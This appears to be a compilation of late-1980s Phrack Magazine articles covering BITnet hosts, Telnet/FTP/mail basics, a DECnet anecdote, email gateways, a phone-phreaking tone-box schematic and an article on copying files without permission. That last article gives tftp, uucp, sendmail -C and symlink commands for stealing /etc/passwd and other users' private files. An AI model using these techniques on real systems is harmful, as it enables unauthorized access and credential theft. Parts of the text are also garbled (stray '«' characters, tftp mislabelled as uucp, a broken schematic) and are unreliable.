129.10.1.6 NUHUB.ACS.NORTHEASTERN.EDU Northeastern University NUHUB 131.151.1.4 UMRVMA.UMR.EDU University of Missouri Rolla UMRVMA 192.9.9.1 SUN.COM Sun Microsystems, Inc. - 192.33.18.30 VM1.NODAK.EDU North Dakota State Univ. NDSUVM1 192.33.18«0 PLAINS.NODAK.EDU North Dakota State Univ. NDSUVAX Please Note: Not every system on BITnet has an IP address. Likewise, not every system that has an IP address is on BITnet. Also, while some locations like Stanford University may have nodes on BITnet and have hosts on the IP as well, this does not necessarily imply that the systems on BITnet and on IP (the EDU domain in this case) are the same systems. Attempts to gain unauthorized access to systems on the internet are not tolerated and is legally a federal offense. At some hosts, they take this very seriously, especially the government hosts such as NASA's Goddard Space Flight Center, where they do not mind telling you so at the main prompt when you connect to their system. However, some nodes are public access to an extent. The DDN Network Information Center can be used by anyone. The server and database there have proven to be an invaluable source of information when locating people, systems, and other information that is related to the Internet. Telnet Remote login refers to logging in to a remote computer from a terminal connected to a local computer. Telnet is the standard protocol in the DOD Protocol Suite for accomplishing this. The "rlogin" program, provided with Berkeley UNIX systems and some other systems, also enables remote login. For purposes of discussion, the "local computer" is the computer to which your terminal is directly connected while the "remote computer" is the computer on the network to which you are communicating and to which your terminal is *NOT* directly connected. Since some computers use a different method of attaching terminals to computers, a better definition would be the following: The "local computer" is the computer that you are currently using and the "remote computer" is the computer on the network with which you are or will be communicating. Note that the terms "host" and "computer" are synonymous in the following discussion. To use Telnet, simply enter the command: TELNET The prompt that Telnet gives is: Telnet> (However, you can specify where you want to Telnet to immediately and bypass the prompts and other delays by issuing the command: TELNET [location].) There is help available by typing in ?. This prints a list of all the valid subcommands that Telnet provides with a one-line explanation. Telnet> ? To connect to another computer, use the open subcommand to open a connection to that computer. For example, to connect to the host "UMCVMB.MISSOURI.EDU", do "open umcvmb.missouri.edu" Telnet will resolve (i.e. Translate, the hostname "umcvmb.missouri.edu" into an IP address and will send a packet to that host requesting login. If the remote host decides to let you attempt a login, it prompts you for your username and password. If the host does not respond, Telnet will "time out" (i.e. Wait for a reasonable amount of time such as 20 seconds) and then terminate with a message such as "Host not responding." If your computer does not have an entry for a remote host in its hosttable and it cannot resolve the name, you can use the IP address explicitly in the telnet command. For example, TELNET 26.0.0.73 (Note: This is the IP address for the DDN Network Information Center [SRI-NIC.ARPA]) If you are successful in logging in, your terminal is connected to the remote host. For all intents and purposes, your terminal is directly hard-wired to that host and you should be able to do anything on your remote terminal that you can do at any local terminal. There are a few exceptions to this rule, however. Telnet provides a network escape character, such as CONTROL-T. You can find out what the escape character is by entering the "status" subcommand: Telnet> status You can change the escape character by entering the "escape" subcommand: Telnet> escape When you type in the escape character, the Telnet prompt returns to your screen and you can enter subcommands. For example, to break the connection, which usually logs you off the remote host, enter the subcommand "quit": Telnet> quit Your Telnet connection usually breaks when you log off the remote host, so the "quit" subcommand is not usually used to log off. When you are logged in to a remote computer via Telnet, remember that there is a time delay between your local computer and the remote one. This often becomes apparent to users when scrolling a long file across the terminal screen and they wish to cancel the scrolling by typing CONTROL-C or something similar. After typing the special control character, the scrolling continues. The special control character takes a certain amount of time to reach the remote computer which is still scrolling information. Thus response from the remote computer will not likely be as quick as response from a local computer. Once you are remotely logged on, the computer you are logged on to effectively becomes your "local computer," even though your original "local computer" still considers you logged on. You can log on to a third computer which would then become your "local computer" and so on. As you log out of each session, your previous session becomes active again. File Transfer FTP is the program that allows files to be sent from one computer to another. "FTP" stands for "File Transfer Protocol". When you start using FTP, a communications channel with another computer on the network is opened. For example, to start using FTP and initiate a file transfer session with a computer on the network called "UMCVMB", you would issue the following subcommand: FTP UMCVMB.MISSOURI.EDU Host "UMCVMB" will prompt you for an account name and password. If your login is correct, FTP will tell you so, otherwise it will say "login incorrect." Try again or abort the FTP program. (This is usually done by typing a special control character such as CONTROL-C. The "program abort" character varies from system to system.) Next you will see the FTP prompt, which is: Ftp> There are a number of subcommands of FTP. The subcommand "?" will list these commands and a brief description of each one. You can initiate a file transfer in either direction with FTP, either from the remote host or to the remote host. The "get" subcommand initiates a file transfer from the remote host (i.e. Tells the remote computer to send the file to the local computer [the one on which you issued the "ftp" command]). Simply enter "get" and FTP will prompt you for the remote host's file name and the (new) local host's file name. Example: Ftp> get Remote file name? theirfile local file name? myfile You can abbreviate this by typing both file names on the same line as the "get" subcommand. If you do not specify a local file name, the new local file will be called the same thing as the remote file. Valid FTP subcommands to get a file include the following: get theirfile myfile get doc.x25 The "put" subcommand works in a similar fashion and is used to send a file from the local computer to the remote computer. Enter the command "put" and FTP will prompt you for the local file name and then the remote file name. If the transfer cannot be done because the file doesn't exist or for some other reason, FTP will print an error message. There are a number of other subcommands in FTP that allow you to do many more things. Not all of these are standard so consult your local documentation or type a question mark at the FTP prompt. Some functions often built into FTP include the ability to look at files before getting or putting them, the ability to change directories, the ability to delete files on the remote computer, and the ability to list the directory on the remote host. An intriguing capability of many FTP implementations is "third party transfers." For example, if you are logged on computer A and you want to cause computer B to send a file to computer C, you can use FTP to connect to computer B and use the "rmtsend" command. Of course, you have to know usernames and passwords on all three computers, since FTP never allows you to peek into someone's directory and files unless you know their username and password. The "cd" subcommand changes your working directory on the remote host. The "lcd" subcommand changes the directory on the local host. For UNIX systems, the meaning of these subcommands is obvious. Other systems, especially those that do not have directory-structured file system, may not implement these commands or may implement them in a different manner. The "dir" and "ls" subcommands do the same thing, namely list the files in the working directory of the remote host. The "list" subcommand shows the contents of a file without actually putting it into a file on the local computer. This would be helpful if you just wanted to inspect a file. You could interrupt it before it reached the end of the file by typing CONTROL-C or some other special character. This is dependent on your FTP implementation. The "delete" command can delete files on the remote host. You can also make and remove directories on the remote host with "mkdir" and "rmdir". The "status" subcommand will tell you if you are connected and with whom and what the state of all your options are. If you are transferring binary files or files with any non-printable characters, turn binary mode on by entering the "binary" subcommand: binary To resume non-binary transfers, enter the "ascii" subcommand. Transferring a number of files can be done easily by using "mput" (multiple put) and "mget" (multiple get). For example, to get every file in a particular directory, first issue a "cd" command to change to that directory and then a "mget" command with an asterisk to indicate every file: cd somedirectory mget * When you are done, use the "close" subcommand to break the communications link. You will still be in FTP, so you must use the "bye" subcommand to exit FTP and return to the command level. The "quit" subcommand will close the connection and exit from FTP at the same time. Mail Mail is the simplest network facility to use in many ways. All you have to do is to create your message, which can be done with a file editor or on the spur of the moment, and then send it. Unlike FTP and Telnet, you do not need to know the password of the username on the remote computer. This is so because you cannot change or access the files of the remote user nor can you use their account to run programs. All you can do is to send a message. There is probably a program on your local computer which does mail between users on that computer. Such a program is called a mailer. This may or may not be the way to send or receive mail from other computers on the network, although integrated mailers are more and more common. UNIX mailers will be used as an example in this discussion. Note that the protocol which is used to send and receive mail over a TCP/IP network is called SMTP, the "Simple Mail Transfer Protocol." Typically, you will not use any program called SMTP, but rather your local mail program. UNIX mailers are usually used by invoking a program named "mail". To receive new mail, simply type "mail". There are several varieties of UNIX mailers in existence. Consult your local documentation for details. For example, the command "man mail" prints out the manual pages for the mail program on your computer. To send mail, you usually specify the address of the recipient on the mail command. For example: "mail knight@umcvmb.missouri.edu" will send the following message to username "knight" on host "umcvmb". You can usually type in your message one line at a time, pressing RETURN after each line and typing CONTROL-D to end the message. Other facilities to include already-existing files sometimes exist. For example, Berkeley UNIX's allow you to enter commands similar to the following to include a file in your current mail message: r myfile In this example, the contents of "myfile" are inserted into the message at this point. Most UNIX systems allow you to send a file through the mail by using input redirection. For example: mail knight@umcvmb.missouri.edu < myfile In this example, the contents of "myfile" are sent as a message to "knight" on "umcvmb." Note that in many UNIX systems the only distinction between mail bound for another user on the same computer and another user on a remote computer is simply the address specified. That is, there is no hostname for local recipients. Otherwise, mail functions in exactly the same way. This is common for integrated mail packages. The system knows whether to send the mail locally or through the network based on the address and the user is shielded from any other details. "The Quest For Knowledge Is Without End..." 123.Phrack Magazine - Vol. 3, Issue 27 by Knight Lightning Prologue For None VMS Users DECnet is the network for DEC machines, in most cases you can say VAX's. DECnet allows you to do: · e-mail · file transfer · remote login · remote command · remote job entry · PHONE PHONE is an interactive communication between users and is equal to TALK on UNIX or a "deluxe"-CHAT on VM/CMS. BELWUE, the university network of the state Baden-Wuerttemberg in West Germany contains (besides other networks) a DECnet with about 400 VAX's. On every VAX there is standard-account called DECNET with pw:= DECNET, which is not reachable via remote login. This account is provided for several DECnet-Utilities and as a pseudo-guest-account. The DECNET-account has very restricted privileges: You cannot edit a file or make another remote login. The HELP is equipped by the system and is similar to the MAN command on UNIX. More information on DECnet can be found in "Looking Around In DECnet" by Deep Thought in this very issue of Phrack Inc. Here, at the University of Ulm, we have an *incredibly* ignorant computer center staff, with an even bigger lack of system-literature (besides the 80kg of VAX/VMS-manuals). The active may search for information by himself, which is over the level of "run," "FORTRAN," or "logout." My good luck that I have other accounts in the BELWUE-DECnet, where more information is offered for the users. I am a regular student in Ulm and all my accounts are completely legal and corresponding to the German laws. I don't call myself a "hacker," I feel more like a "user" (...it's more a defining-problem). In the HELP-menu in a host in Tuebingen I found the file netdcl.com and the corresponding explanation, which sends commands to the DECNET-Account of other VAX's and executes them there (remote command). The explanation in the HELP-menu was idiot-proof -- therefore for me, too :-) With the command "$ mcr ncp show known nodes" you can obtain a list of all netwide active VAX's, as is generally known, and so I pinged all these VAX's to look for more information for a knowledge-thirsty user. With "help", "dir" and other similar commands I look around on those DECnet accounts, always watching for topics related to the BELWUE-network. It's a pity, that 2/3 of all VAX's have locked the DECNET-Account for NETDCL.COM. Their system managers are probably afraid of unauthorized access, but I cannot imagine how there could be such an unauthorized access, because you cannot log on this account -- no chance for trojan horses, etc. Some system managers called me back after I visited their VAX to chat with me about the network and asked me if they could help me in any way. One sysop from Stuttgart even sent me a version of NETDCL.COM for the ULTRIX operation system. Then, after a month, the HORROR came over me in shape of a the following mail: --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- From: TUEBINGEN::SYSTEM 31-MAY-1989 15:31:11.38 To: FRAMSTAG CC: Subj: don't make any crap, or you'll be kicked out! From: ITTGPX::SYSTEM 29-MAY-1989 16:46 To: TUEBINGEN::SYSTEM Subj: System-breaking-in 01-May-1989 To the system manager of the Computer TUEBINGEN, On May 1st 1989 we had a System-breaking-in in our DECNET-account, which started from your machine. By help of our accounting we ascertained your user FRAMSTAG to have emulated an interactive log-on on our backbone-node and on every machine of our VAX-cluster with the "trojan horse" NETDCL.COM. Give us this user's name and address and dear up the occurrence completely. We point out that the user is punishable. In case of repetition we would be forced to take corresponding measures. We will check whether our system got injured. If not, this time we will disregard any measure. Inform us via DECnet about your investigation results -- we are attainable by the nodenumber 1084::system Dipl.-Ing. Michael Hager --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- My system manager threatened me with the deleting of my account, if I would not immediately enlighten the affair. *Gulp*! I was conscious about my innocence, but how to tell it to the others? I explained, step by step, everything to my system manager. He then understood after a while, but the criminal procedure still hovered over me... so, I took quickly to my keyboard, to compose file of explanations and to send it to that angry system manager in Stuttgart (node 1084 is an institute there). But no way out: He had run out of disk quota and my explanation-mail sailed into the nirwana: --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- $ mail explanation To: 1084::system %MAIL-E, error sending to user SYSTEM at 1084 %MAIL-E-OPENOUT, error opening SYS$SYSROOT:[SYSMGR]MAIL$00040092594FD194.MAI; as output -RMS-E-CRE, ACP file create failed -SYSTEM-F-EXDISKQUOTA, disk quota exceeded --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- Also the attempt of a connection with the PHONE-facility failed: In his borderless hacker-paranoia, he cut off his PHONE... and nowhere is a list with the REAL-addresses of the virtual DECnet-addresses available (to prevent hacking). Now I stood there with the brand "DANGEROUS HACKER!" and I had no chance to vindicate myself. I poured out my troubles to an acquaintance of mine, who is a sysop in the computer-center in Freiburg. He asked other sysops and managers thru the whole BELWUE-network until someone gave him a telephone number after a few days -- and that was the right one! I phoned to this Hager and told him what I had done with his DECnet-account and also what NOT. I wanted to know which crime I had committed. He promptly canceled all of his reproaches, but he did not excuse his defames incriminations. I entreated him to inform my system manager in Tuebingen that I have done nothing illegal and to stop him from erasing my account. This happens already to a fellow student of mine (in this case, Hager was also guilty). He promised me that he would officially cancel his reproaches. After over a week this doesn't happen (I'm allowed to use my account further on). In return for it, I received a new mail from Hager on another account of mine: --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- From: 1084::HAGER 1-JUN-1989 12:51 To: 50180::STUD_11 Subj: System-breaking-in On June 1st 1989 you have committed a system-breaking-in on at least one of our VAX's. We were able to register this occurrence. We would be forced to take further measure if you did not dear up the occurrence completely until June 6th. Of course the expenses involved would be imposed on you. Hence enlightenment must be in your own interest. We are attainable via DECnet-mail with the address 1084::HAGER or via following address: Institut fuer Technische Thermodynamik und Thermische Verfahrenstechnik Dipl.-Ing. M. Hager Tel.: 0711/685-6109 Dipl.-Ing. M. Mrzyglod Tel.: 0711/685-3398 Pfaffenwaldring 9/10-1 7000 Stuttgart-80 M. Hager M. Mrzyglod --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- This was the reaction of my attempt: "$ PHONE 1084::SYSTEM". I have not answered to this mail. I AM SICK OF IT! 124. Phrack Magazine - Vol. 3, Issue 28 by Taran King ACSNET Australian Computer Science Network (ACSNET), also known as Oz, has its gateway through the CSNET node munnari.oz.au and if you cannot directly mail to the oz.au domain, try either username%munnari.oz.au@UUNET.UU.NET or munnari! username@UUNET.UU.NET. AT&T MAIL AT&T Mail is a mailing service of AT&T, probably what you might call it's MCI-Mail equivalent. It is available on the UUCP network as node name attmail but I've had problems having mail get through. Apparently, it does cost money to mail to this service and the surrounding nodes are not willing to pick up the tab for the ingoing mail, or at least, this has seemingly been the case thus far. I believe, though, that perhaps routing to att!attmail!user would work. AT&T recently announced six new X.400 interconnections between AT&T Mail and electronic mail services in the US, Korea, Sweden, Australia, and Finland. In the US, AT&T Mail is now interconnected with Telenet Communications Corporation's service, Telemail, allowing users of both services to exchange messages easily. With the addition of these interconnections, the AT&T Mail Gateway 400 Service allows AT&T Mail subscribers to exchange messages with users of the following electronic messaging systems: Company E-Mail Name Country TeleDelta TeDe 400 Sweden OTC MPS400 Australia Telecom-Canada Envoy100 Canada DACOM DACOM MHS Korea P&T-Tele MailNet 400 Finland Helsinki Telephone Co. ELISA Finland Dialcom Dialcom USA Telenet Telemail USA KDD Messavia Japan Transpac ATLAS400 France The interconnections are based on the X.400 standard, a set of guidelines for the format, delivery and receipt of electronic messages recommended by an international standards committee the CCITT. International X.400 messages incur a surcharge. They are: To Canada: Per note: $.05 Per message unit: $.10 To other international locations: Per note: $.20 Per message unit: $«0 There is no surcharge for X.400 messages within the US The following are contacts to speak with about mailing through these mentioned networks. Other questions can be directed through AT&T Mail's toll-free number, 1-800-624-5672. MHS Gateway: mhs!atlas MHS Gateway: mhs!dacom Administrator: Bernard Tardieu Administrator: Bob Nicholson Transpac AT&T Phone: 3399283203 Morristown, NJ 07960 Phone: +1 201 644 1838 MHS Gateway: mhs!dialcom MHS Gateway: mhs!elisa Administrator: Mr. Laraman Administrator: Ulla Karajalainen Dialcom Nokia Data South Plainfield, NJ 07080 Phone: 01135804371 Phone: +1 441 493 3843 MHS Gateway: mhs!envoy MHS Gateway: mhs!kdd Administrator: Kin C. Ma Administrator: Shigeo Lwase Telecom Canada Kokusai Denshin Denwa CO. Phone: +1 613 567 7584 Phone: 8133477419 MHS Gateway: mhs!mailnet MHS Gateway: mhs!otc Administrator: Kari Aakala Administrator: Gary W. Krumbine Gen Directorate Of Post & AT&T Information Systems Phone: 35806921730 Lincroft, NJ 07738 Phone: +1 201 576 2658 MHS Gateway: mhs!telemail MHS Gateway: mhs Administrator: Jim Kelsay Administrator: AT&T Mail MHS GTE Telenet Comm Corp Gateway Reston, VA 22096 AT&T Phone: +1 703 689 6034 Lincroft, NJ 08838 Phone: +1 800 624 5672 CMR Previously known as Intermail, the Commercial Mail Relay (CMR) Service is a mail relay service between the Internet and three commercial electronic mail systems: US Sprint/Telenet, MCI-Mail, and DIALCOM systems (i.e. Compmail, NSFMAIL, and USDA-MAIL). An important note: The only requirement for using this mail gateway is that the work conducted must be DARPA sponsored research and other approved government business. Basically, this means that unless you've got some government-related business, you're not supposed to be using this gateway. Regardless, it would be very difficult for them to screen everything that goes through their gateway. Before I understood the requirements of this gateway, I was sending to a user of MCI-Mail and was not contacted about any problems with that communication. Unfortunately, I mistyped the MCI-Mail address on one of the letters and that letter ended up getting read by system administrators who then informed me that I was not to be using that system, as well as the fact that they would like to bill me for using it. That was an interesting thought on their part anyway, but do note that using this service does incur charges. The CMR mailbox address in each system corresponds to the label: Telemail: [Intermail/USCISI]TELEMAIL/USA MCI-Mail: Intermail or 107-8239 CompMail: Intermail or CMP0817 NSF-Mail: Intermail or NSF153 USDA-Mail: Intermail or AGS9999 Addressing examples for each e-mail system are as follows: MCIMAIL: 123-4567 seven digit address Everett T. Bowens person's name (must be unique!) COMPMAIL: CMP0123 three letters followed by three or four digits S.Cooper initial, then "." and then last name 134:CMP0123 domain, then ":" and then combination system and account number NSFMAIL: NSF0123 three letters followed by three or four digits A.Phillips initial, then "." and then last name 157:NSF0123 domain, then ":" and then combination system and account number USDAMAIL: AGS0123 three letters followed by three or four digits P.Shifter initial, then "." and then last name 157:AGS0123 domain, then ":" and then combination system and account number TELEMAIL: BARNOC user (directly on Telemail) BARNOC/LODH user/organization (directly on Telemail) [BARNOC/LODH]TELEMAIL/USA [user/organization]system branch/country The following are other Telenet system branches/countries that can be mailed to: TELEMAIL/USA NASAMAIL/USA MAIL/USA TELEMEMO/AUSTRALIA TELECOM/CANADA TOMMAIL/CHILE TMAILUK/GB ITALMAIL/ITALY ATI/JAPAN PIPMAIL/ROC DGC/USA FAAMAIL/USA GSFC/USA GTEMAIL/USA TM11/USA TNET.TELEMAIL/USA USDA/USA Note: OMNET's ScienceNet is on the Telenet system MAIL/USA and to mail to it, the format would be [A.MAILBOX/OMNET]MAIL/USA. The following are available subdivisions of OMNET: AIR Atmospheric Sciences EARTH Solid Earth Sciences LIFE Life Sciences OCEAN Ocean Sciences POLAR Interdisciplinary Polar Studies SPACE Space Science and Remote Sensing The following is a list of DIALCOM systems available in the listed countries with their domain and system numbers: Service Name Country Domain Number System Number Keylink-Dialcom Australia 60 07, 08, 09 Dialcom Canada 20 20, 21, 22, 23, 24 DPT Databooks Denmark 124 71 Telebox Finland 127 62 Telebox West Germany 30 15, 16 Dialcom Hong Kong 80 88, 89 Eirmail Ireland 100 74 Goldnet Israel 50 05, 06 Mastermail Italy 130 65, 67 Mastermail Italy 1 66, 68 Dialcom Japan 70 13, 14 Dialcom Korea 1 52 Telecom Gold Malta 100 75 Dialcom Mexico 1 52 Memocom Netherlands 124 27, 28, 29 Memocom Netherlands 1 55 Starnet New Zealand 64 01, 02 Dialcom Puerto Rico 58 25 Telebox Singapore 88 10, 11, 12 Dialcom Taiwan 1 52 Telecom Gold United Kingdom 100 01, 04, 17, 80-89 DIALCOM USA 1 29-34, 37, 38, 41-59, 61-63, 90-99 NOTE: You can also mail to username@NASAMAIL.NASA.GOV or username@GSFCMAIL.NASA.GOV instead of going through the CMR gateway to mail to NASAMAIL or GSFCMAIL. For more information and instructions on how to use CMR, send a message to the user support group at intermail-request@intermail.isi.edu (you'll get basically what I've listed plus maybe a bit more). Please read Chapter 3 of The Future Transcendent Saga (Limbo to Infinity) for specifics on mailing to these destination mailing systems. COMPUSERVE CompuServe is well known for its games and conferences. It does, though, have mailing capability. Now, they have developed their own Internet domain, called COMPUSERVE.COM. It is relatively new and mail can be routed through either TUT.CIS.OHIO-STATE.EDU or NORTHWESTERN.ARPA. Example: user%COMPUSERVE.COM@TUT.CIS.OHIO-STATE.EDU or replace TUT.CIS.OHIO-STATE.EDU with NORTHWESTERN.ARPA). The CompuServe link appears to be a polled UUCP connection at the gateway machine. It is actually managed via a set of shell scripts and a comm utility called xcomm, which operates via command scripts built on the fly by the shell scripts during analysis of what jobs exist to go into and out of CompuServe. CompuServe subscriber accounts of the form 7xxxx, yyyy can be addressed as 7xxxx.yyyy@compuserve.com. CompuServe employees can be addressed by their usernames in the csi.compuserve.com subdomain. CIS subscribers write mail to ">inet:user@host.domain" to mail to users on the Wide-Area Networks, where ">gateway:" is CompuServe's internal gateway access syntax. The gateway generates fully-RFC-compliant headers. To fully extrapolate -- from the CompuServe side, you would use their EasyPlex mail system to send mail to someone in BITNET or the Internet. For example, to send me mail at my Bitnet ID, you would address it to: INET:C488869%UMCVMB.BITNET@CUNYVM.CUNY.EDU Or to my Internet ID: INET:C488869@UMCVMB.MISSOURI.EDU Now, if you have a BITNET to Internet userid, this is a silly thing to do, since your connect time to CompuServe costs you money. However, you can use this information to let people on CompuServe contact YOU. CompuServe Customer Service says that there is no charge to either receive or send a message to the Internet or BITNET. DASNET DASnet is a smaller network that connects to the Wide-Area Networks but charges for their service. DASnet subscribers get charged for both mail to users on other networks AND mail for them from users of other networks. The following is a brief description of DASnet, some of which was taken from their promotional text letter. DASnet allows you to exchange electronic mail with people on more than 20 systems and networks that are interconnected with DASnet. One of the drawbacks, though, is that, after being subscribed to these services, you must then subscribe to DASnet, which is a separate cost. Members of Wide-Area networks can subscribe to DASnet too. Some of the networks and systems reachable through DASnet include the following: ABA/net, ATT Mail, BIX (Byte Information eXchange), DASnet Network, Dialcom, EIES, EasyLink, Envoy 100, FAX, GeoMail, INET, MCI Mail, NWI, PeaceNet/EcoNet, Portal Communications, The Meta Network, The Source, Telemail, ATI's Telemail (Japan), Telex, TWICS (Japan), UNISON, UUCP, The WELL, and Domains (i.e. ".COM" and ".EDU" etc.). New systems are added all of the time. As of the writing of this file, Connect, GoverNET, MacNET, and The American Institute of Physics PI-MAIL are soon to be connected. You can get various accounts on DASnet including: · Corporate Accounts -- If your organization wants more than one individual subscription. · Site Subscriptions -- If you want DASnet to link directly to your organization's electronic mail system. To send e-mail through DASnet, you send the message to the DASnet account on your home system. You receive e-mail at your mailbox, as you do now. On the Wide-Area Networks, you send mail to XB.DAS@STANFORD.BITNET. On the Subject: line, you type the DASnet address in brackets and then the username just outside of them. The real subject can be expressed after the username separated by a "!" (Example: Subject: [0756TK]randy!How's Phrack?). The only disadvantage of using DASnet as opposed to Wide-Area networks is the cost. Subscription costs as of 3/3/89 cost $4.75 per month or $5.75 per month for hosts that are outside of the USA You are also charged for each message that you send. If you are corresponding with someone who is not a DASnet subscriber, THEIR MAIL TO YOU is billed to your account. The following is an abbreviated cost list for mailing to the different services of DASnet: PARTIAL List DASnet Cost DASnet Cost of Services 1st 1000 Each Additional 1000 Linked by DASnet (e-mail) Characters Characters: INET, MacNET, PeaceNet, NOTE: 20 lines Unison, UUCP*, Domains, .21 .11 of text is app. e.g. .COM, .EDU* 1000 characters. Dialcom--Any "host" in US .36 .25 Dialcom--Hosts outside US .93 .83 EasyLink (From EasyLink) .21 .11 (To EasyLink) «5 .23 US FAX (international avail.) .79 .37 GeoMail--Any "host" in US .21 .11 GeoMail--Hosts outside US .74 .63 MCI (from MCI) .21 .11 (to MCI) .78 .25 (Paper mail - USA) 2.31 .21 Telemail .36 .25 W.U. Telex--United States 1.79 1.63 (You can also send Telexes outside the US) TWICS--Japan .89 .47 * The charges given here are to the gateway to the network. The DASnet user is not charged for transmission on the network itself. Subscribers to DASnet get a free DASnet Network Directory as well as a listing in the directory, and the ability to order optional DASnet services like auto-porting or DASnet Telex Service which gives you your own Telex number and answerback for $8.40 a month at this time. DASnet is a registered trademark of DA Systems, Inc. DA Systems, Inc. 1503 E. Campbell Ave. Campbell, CA 95008 408-559-7434 TELEX: 910 380-3530 The following two sections on PeaceNet and AppleLink are in association with DASnet as this network is what is used to connect. 125. Phrack Magazine - Vol. 3, Issue 28 by Dispater Introduction: After reading the earlier renditions of schematics for the Pearl Box, I decided that there was an easier and cheaper way of doing the same thing with an IC and parts you probably have just laying around the house. What Is A Pearl Box and Why Do I Want One? A Pearl Box is a tone generating device that is used to make a wide range of single tones. Therefore, it would be very easy to modify this basic design to make a Blue Box by making 2 Pearl Boxes and joining them together in some fashion. A Pearl Box can be used to create any tone you wish that other boxes may not. It also has a tone sweep option that can be used for numerous things like detecting different types of phone tapping devices. Parts List: · CD4049 RCA integrated circuit · .1 uF disk capacitor · 1 uF 16V electrolitic capacitor · 1K resistor · 10M resistor · 1Meg pot · 1N914 diode · Some SPST momentary push-button switches · 1 SPDT toggle switch · 9 Volt battery & clip and miscellaneous stuff you should have laying around the house. State-of-the-Art-Text Schematic: + 16V 1uF - _______________________________||_____ | ! ! || | _ | _______________________ |__________| |/| 8ohms ____|__|_____:__|__:__|_ | __________| | | | 9 10 11 12 13 14 15 16 | | | |_|\| | CD4049UBE | | | |_1__2__3__4__5__6__7__8_| : | _ | | |__| |__| | |____________________|_________[-] | | ! ! : [b] | |__________________________| [a] | : : | [t] | ! 1N914 ! ! [t] |___________|/|_____________________________________[+] : |\| : : | | | | 10M | | |___/\/\/\__| | | | | |_____||____| | <-- These 2 wires to the center pole || | | of switch. .1uF 50V | | | | _______________________| |_____________________________ | ___[Toggle Switch]____________ | | | | ___ | | | | o o | | | | /\/\/\___| |__| |_/\/\/\____/\/\/\ | | ^ | 1K ^ | |____| ___ | |___| | o o | | /\/\/\___| |__| 126. Phrack Magazine - Vol. 3, Issue 28 by Dark OverLord There are many ways of getting copies of files from a remote system that you do not have permission to read or an account on login on to and access them through. Many administrators do not even bother to restrict many access points that you can use. Here are the simplest ways: 1.Use uucp(1) [Trivial File Transfer Protocol] to retrieve a copy of a file if you are running on an Internet based network. 2.Abuse uucp(1) [Unix to Unix Copy Program] to retrieve a copy of a file if uucp connections are running on that system. 3.Access one of many known security loopholes. In the following examples, we will use the passwd file as the file to acquire since it is a readable file that can be found on most systems that these attacks are valid on. Method A : 1.First start the tftp program: Enter the command: tftp [You have the following prompt:] tftp> 2.The next step is to connect to the system that you wish to retrieve files from. At the tftp, type: tftp> connect other.system.com 3.Now request the file you wish to get a copy of (in our case, the passwd file /etc/passwd ): tftp> get /etc/passwd /tmp/passwd [You should see something that looks like the following:] Received 185659 bytes in 22 seconds. 4.Now exit the tftp program with the "quit" command: tftp> quit You should now have a copy of other.system.com's passwd file in your directory. NOTE: Some Unix systems' tftp programs have a different syntax. The above was tested under SunOS 4.0 For example, on Apollos, the syntax is: tftp -{g|g!|p|r|w} [netascii|image] Thus you must use the command: tftp -g password_file networked-host /etc/passwd Consult your local "man" pages for more info (or in other words RTFM). At the end of this article, I will include a shell script that will snarf a password file from a remote host. To use it type: gpw system_name Method B : Assuming we are getting the file /etc/passwd from the system uusucker, and our system has a direct uucp connection to that system, it is possible to request a copy of the file through the uucp links. The following command will request that a copy of the passwd file be copied into uucp's home directory /usr/spool/uucppublic : uucp -m uusucker!/etc/passwd '>uucp/uusucker_passwd' The flag "-m" means you will be notified by mail when the transfer is completed. Method C: The third possible way to access the desired file requires that you have the login permission to the system. In this case we will utilize a well-known bug in Unix's sendmail daemon. The sendmail program has and option "-C" in which you can specify the configuration file to use (by default this file is /usr/lib/sendmail.cf or /etc/sendmail.cf). It should also be noted that the diagnostics outputted by sendmail contain the offending lines of text. Also note that the sendmail program runs setuid root. The way you can abuse this set of facts (if you have not yet guessed) is by specifying the file you wish read as the configuration file. Thus the command: sendmail -C/usr/accounts/random_joe/private/file Will give you a copy of random joe's private file. Another similar trick is to symlink your .mailcf file to joe's file and mail someone. When mail executes sendmail (to send the mail), it will load in your mailcf and barf out joe's stuff. First, link joe's file to your .mailcf . ln -s /usr/accounts/random_joe/private/file $HOME/.mailcf Next, send mail to someone. mail C488869@umcvmb.missouri.edu 127.Phrack Magazine - Vol. 3, Issue 30 by Phone Phanatic "Until a few years ago -- maybe ten -- it was very common to see TWX and Telex machines in almost every business place." There were only minor differences between Telex and TWX. The biggest difference was that the former was always run by Western Union, while the latter was run by the Bell System for a number of years. TWX literally meant "(T)ype(W)riter e(x)change," and it was Bell's answer to competition from Western Union. There were "three row" and "four row" machines, meaning the number of keys on the keyboard and how they were laid out. The "three row" machines were simply part of the regular phone network; that is, they could dial out and talk to another TWX also connected on regular phone lines. Eventually these were phased out in favor of "newer and more improved" machines with additional keys, as well as a paper tape reader attachment which allowed sending the same message repeatedly to many different machines. These "four row" machines were not on the regular phone network, but were assigned their own area codes (410-510-610-710-810-910) where they still remain today. The only way a four row machine could call a three row machine or vice-versa was through a gateway of sorts which translated some of the character set unique to each machine. Western Union's network was called Telex and in addition to being able to contact (by dial up) other similar machines, Telex could connect with TWX (and vice-versa) as well as all the Western Union public offices around the country. Until the late 1950's or early 1960's, every small town in America had a Western Union office. Big cities like Chicago had perhaps a dozen of them, and they used messengers to hand deliver telegrams around town. Telegrams could be placed in person at any public office, or could be called in to the nearest public office. By arrangement with most telcos, the Western Union office in town nearly always had the phone number 4321, later supplemented in automated exchanges with some prefix XXX-4321. Telegrams could be charged to your home phone bill (this is still the case in some communities) and from a coin phone, one did not ask for 4321, but rather, called the operator and asked for Western Union. This was necessary since once the telegram had been given verbally to the wire clerk, s/he in turn had to flash the hook and get your operator back on the line to tell them "collect five dollars and twenty cents" or whatever the cost was. Telegrams, like phone calls, could be sent collect or billed third party. If you had an account with Western Union, i.e. a Telex machine in your office, you could charge the calls there, but most likely you would simply send the telegram from there in the first place. Sometime in the early 1960's, Western Union filed suit against AT&T asking that they turn over their TWX business to them. They cited an earlier court ruling, circa 1950's, which said AT&T was prohibited from acquiring any more telephone operating companies except under certain conditions. The Supreme Court agreed with Western Union that "spoken messages" were the domain of Ma Bell, but "written messages" were the domain of Western Union. So Bell was required to divest itself of the TWX network, and Western Union has operated it since, although a few years ago they began phasing out the phrase 